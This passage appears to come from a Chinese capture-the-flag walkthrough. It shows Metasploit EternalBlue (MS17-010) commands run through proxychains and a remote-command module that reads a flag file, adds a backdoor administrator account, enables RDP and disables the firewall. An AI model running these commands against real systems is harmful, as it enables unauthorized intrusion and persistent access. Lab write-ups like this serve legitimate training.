proxychains4 msfconsole use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp_uuid set RHOSTS 172.22.1.21 exploit
拿不到shell,那就换一个打法,去执行命令试试
1 2 3
use admin/smb/ms17_010_command set rhosts 192.168.20.30 set command type c:\\flag.txt
可以直接获取flag。给他开个3389然后连接上去dump下hash,在这之前先添加个后门用户
1 2 3 4
set command net user ocean admin@123 /add set COMMAND net localgroup Administrators ocean /add set COMMAND 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' set COMMAND netsh firewall set opmode disable